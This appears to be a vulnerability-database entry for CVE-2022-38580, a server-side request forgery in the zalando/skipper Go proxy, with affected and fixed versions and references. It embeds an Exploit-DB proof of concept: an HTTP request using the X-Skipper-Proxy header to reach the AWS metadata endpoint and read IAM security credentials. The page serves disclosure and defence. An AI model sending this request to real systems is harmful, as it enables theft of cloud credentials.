CVE-2022-38580
unknown
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
1.0
Description
Server-side request forger via X-Skipper-Proxy in github.com/zalando/skipper
Predictions
Exploit likelihood
30%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
Proof Of Concept:
1- Add header "X-Skipper-Proxy" to your request
2- Add the aws metadata to the path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Go | github.com/zalando/skipper | <0.13.237 | 0.13.237 |
References
- https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
- https://nvd.nist.gov/vuln/detail/CVE-2022-38580
- https://github.com/zalando/skipper/pull/2058
- https://github.com/zalando/skipper/commit/842634347da8fe77e396f66edea79d329fd72130
- https://gist.github.com/Fadavvi/9fffcfa4aaa9e25b77cfe7b3044b2857#file-cve-2022-38580
- https://github.com/zalando/skipper
- https://github.com/zalando/skipper/releases/tag/v0.13.237
- https://pastebin.com/dXxpgPAK
- https://pkg.go.dev/vuln/GO-2022-1086
- http://packetstormsecurity.com/files/171546/X-Skipper-Proxy-0.13.237-Server-Side-Request-Forgery.html
- http://skipper.com
- http://zalando.com
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.